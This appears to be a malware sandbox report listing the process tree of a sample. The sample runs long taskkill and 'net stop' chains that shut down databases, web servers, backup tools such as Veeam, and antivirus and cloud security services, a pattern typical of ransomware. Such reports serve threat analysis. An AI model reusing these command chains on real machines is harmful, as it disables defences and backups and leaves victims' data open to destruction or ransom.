C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGame.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServerView.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IcafeServicesTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BsAgent_0.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ControlServer.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DisklessServer.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rcrelay.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SogouImeBroker.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CCenter.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFrm.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM d_manage.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RsTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wampmanager.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RavTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mssearch.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlmangr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msftesql.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseSvr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseConsole.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aspnet_state.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoBackUpEx.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM redis-server.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MySQLNotifier.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oravssw.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fppdis5.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM His6Service.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ThunderPlatform.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iexplore.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent-daemon.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSightService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cygrunsrv.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wrapper.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM nginx.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM node.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sshd.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-tray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iempwatchdog.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "notepad++.exe" /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "phpStudy.exe" /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM OPCClient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SupportAssistAgent.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SunloginClient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SOUNDMAN.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WeChat.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TXPlatform.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdhost.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdlauncher.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM reportingservicesservice.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM softmgrlite.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlbrowser.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssms.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmtoolsd.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM baidunetdisk.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM yundetectservice.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssclient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNAupdaemon.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxEM.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCp164.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxHK.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxTray.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM 360bdoctor.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PrivacyIconClient.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""3⤵
-
C:\Windows\SysWOW64\net.exenet stop UIODetect4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UIODetect5⤵
-
C:\Windows\SysWOW64\net.exenet stop VMwareHostd4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMwareHostd5⤵
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer84⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer85⤵
-
C:\Windows\SysWOW64\net.exenet stop VMUSBArbService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMUSBArbService5⤵
-
C:\Windows\SysWOW64\net.exenet stop VMAuthdService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMAuthdService5⤵
-
C:\Windows\SysWOW64\net.exenet stop wanxiao-monitor4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wanxiao-monitor5⤵
-
C:\Windows\SysWOW64\net.exenet stop WebAttendServer4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WebAttendServer5⤵
-
C:\Windows\SysWOW64\net.exenet stop mysqltransport4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysqltransport5⤵
-
C:\Windows\SysWOW64\net.exenet stop VMnetDHCP4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMnetDHCP5⤵
-
C:\Windows\SysWOW64\net.exenet stop Tomcat84⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Tomcat85⤵
-
C:\Windows\SysWOW64\net.exenet stop "VMware NAT Service"4⤵
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer4⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer5⤵
-
C:\Windows\SysWOW64\net.exenet stop QPCore4⤵
-
C:\Windows\SysWOW64\net.exenet stop CASLicenceServer4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASLicenceServer5⤵
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdateService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdateService5⤵
-
C:\Windows\SysWOW64\net.exenet stop CASWebServer4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Detect Service"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"5⤵
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Update Service"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"5⤵
-
C:\Windows\SysWOW64\net.exenet stop "AliyunService"4⤵
-
C:\Windows\SysWOW64\net.exenet stop CASXMLService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASXMLService5⤵
-
C:\Windows\SysWOW64\net.exenet stop AGSService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AGSService5⤵
-
C:\Windows\SysWOW64\net.exenet stop RapService4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"3⤵
-
C:\Windows\SysWOW64\net.exenet stop HaoZipSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop "igfxCUIService2.0.0.0"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"5⤵
-
C:\Windows\SysWOW64\net.exenet stop Realtek11nSU4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Realtek11nSU5⤵
-
C:\Windows\SysWOW64\net.exenet stop xenlite4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xenlite5⤵
-
C:\Windows\SysWOW64\net.exenet stop XenSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop XenSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.24⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.25⤵
-
C:\Windows\SysWOW64\net.exenet stop DellDRLogSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DellDRLogSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop FirebirdGuardianDeafaultInstance4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance5⤵
-
C:\Windows\SysWOW64\net.exenet stop JWEM3DBAUTORun4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWEM3DBAUTORun5⤵
-
C:\Windows\SysWOW64\net.exenet stop JWRinfoClientService4⤵
-
C:\Windows\SysWOW64\net.exenet stop JWService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWService5⤵
-
C:\Windows\SysWOW64\net.exenet stop Service24⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Service25⤵
-
C:\Windows\SysWOW64\net.exenet stop RapidRecoveryAgent4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapidRecoveryAgent5⤵
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance4⤵
-
C:\Windows\SysWOW64\net.exenet stop AdobeARMservice4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AdobeARMservice5⤵
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc4⤵
-
